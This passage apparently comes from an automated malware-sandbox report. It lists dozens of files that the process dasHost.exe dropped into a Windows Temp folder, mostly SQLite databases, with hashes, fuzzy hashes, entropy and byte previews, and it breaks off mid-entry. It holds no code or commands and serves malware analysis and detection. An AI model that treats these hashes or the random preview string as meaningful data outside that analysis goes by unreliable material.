                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\dmO8BM4vQ1

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\dzlpH6d5Ob

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):25
                                                                        Entropy (8bit):4.453660689688184
                                                                        Encrypted:false
                                                                        SSDEEP:3:1V/Wn:PWn
                                                                        MD5:E57858FF96F3A6A89C77B8C04CBA9B39
                                                                        SHA1:EF68063BA36A2016BF0EC8ACD768D6D59CA163D1
                                                                        SHA-256:F386DD76FBC6D37E5D5F94A3E2B140FC716A0453441FB5228501532A974CB555
                                                                        SHA-512:AC9E416B1A8CA5898A956B86CDDEF6E452AEBE5FE6105268D09B11F17ECBE70672B432F100A7C60AC9C07D087DAC72447627835407E1AD66BACB71FAAAEB695E
                                                                        Malicious:false
                                                                        Preview:knQrJokH7udsF90i2kmgxGvIy

                                                                        C:\Users\user\AppData\Local\Temp\e2HRBKWaCc

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\eLr4Pb3jmL

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\eQe547vmEm

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\fzECSZ8JoD

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\g0U8o60x20

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\h2tmk0Y5pM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\h3bMvQBsn8

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\hA59a7ht94

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\hEa98JP2Bn

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\hi1VUgBky6

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\hlKWGWEAdu

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\i0cIuIktyo

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\i9oqLTjOP3

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\iKJkaEAGEb

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\iQIy5qXV26

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ig0wGuN168

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\iuGSsWbpiF

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\iyZ8Grc2Dj

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\j4HdlhXIO4

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\jDfjNEWOms

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\jFkDmHE0jU

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\jITaaX9V9Z

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
